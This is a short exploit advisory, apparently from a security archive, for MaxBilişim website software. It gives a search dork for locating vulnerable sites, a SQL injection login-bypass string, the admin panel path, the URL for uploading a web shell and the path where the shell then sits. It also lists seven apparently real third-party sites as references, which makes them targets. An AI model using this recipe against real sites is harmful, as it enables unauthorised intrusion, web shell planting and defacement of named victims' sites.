MaxBilişim SQL Bypass & Shell Upload

Published
Credit
Risk
2016.08.07
Av3LoXiS
High
CWE
CVE
Local
Remote
N/A
N/A
No
Yes
Dork: inurl:/index.php/ & Yazılım Maxbilişim

#Sql Bypass Code :

' or '1'='1' -- ' ~ ' or '1'='1'

#Admin Panel

http://www.example.com/myadmin/index.php

Shell Upload Link :

http://www.example.com/myadmin/index.php?panel=19

Shell Link :

http://www.example.com/images/temp/shellname.php

==========================================
# Discovered by : Av3LoXiS
# FB : /Av3LoXiS
#Zone -h : Av3LoXiS

References:

http://www.temser.com/myadmin/index.php
http://www.panjurkepenk.net/myadmin/index.php
http://www.elitiumestetik.com/myadmin/index.php
http://www.okmetal.com.tr/myadmin/index.php
http://www.tekkkumlama.com/myadmin/index.php
http://www.nice-motor.com/myadmin/index.php
http://www.baykuaformurat.com/myadmin/index.php


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com